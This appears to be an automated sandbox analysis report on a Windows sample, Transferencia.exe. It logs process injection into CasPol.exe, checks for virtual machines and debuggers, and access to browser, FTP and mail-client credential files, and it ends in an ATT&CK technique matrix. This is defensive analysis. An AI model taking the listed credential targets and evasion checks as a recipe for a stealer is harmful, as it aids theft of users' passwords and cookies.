            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:304:WilStaging_02
            Source: C:\Users\user\Desktop\Transferencia.exeFile written: C:\Users\user\AppData\Local\Temp\FJERKRFARMENES.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Transferencia.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000009.00000000.100478953847.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.100639341995.0000000002FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_700D30C0 push eax; ret
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE72E7 pushad ; ret
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE84E2 push cs; ret
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FEB218 push ds; iretd
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FEADD8 push ebp; retn 0000h
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FEA5A7 push ebx; retf
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FEB181 push ds; iretd
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE7306 pushad ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D8AAD66 push ss; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC1CBC push ds; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20E43638 push ds; ret
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_700D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\Transferencia.exeFile created: C:\Users\user\AppData\Local\Temp\nsj4C7E.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Transferencia.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Transferencia.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Transferencia.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: Transferencia.exe, 00000002.00000002.100638257643.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Source: Transferencia.exe, 00000002.00000002.100638364215.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7292Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9B73 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9183
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D8A0C40 sldt word ptr [eax]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_00406850 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_0040290B FindFirstFileW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Transferencia.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\Transferencia.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\Transferencia.exeAPI call chain: ExitProcess graph end node
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000009.00000002.105232196852.000000000154F000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: CasPol.exe, 00000009.00000002.105231609654.0000000001500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW 4V
            Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Transferencia.exe, 00000002.00000002.100638257643.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Transferencia.exe, 00000002.00000002.100638364215.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_700D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9B73 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF5AD4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FED271 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF45CB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FED1B7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FED1B4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF0743 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECB01 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Transferencia.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Transferencia.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1350000
            Source: C:\Users\user\Desktop\Transferencia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
            Source: Yara matchFile source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: Yara matchFile source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
            Source: Yara matchFile source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            117
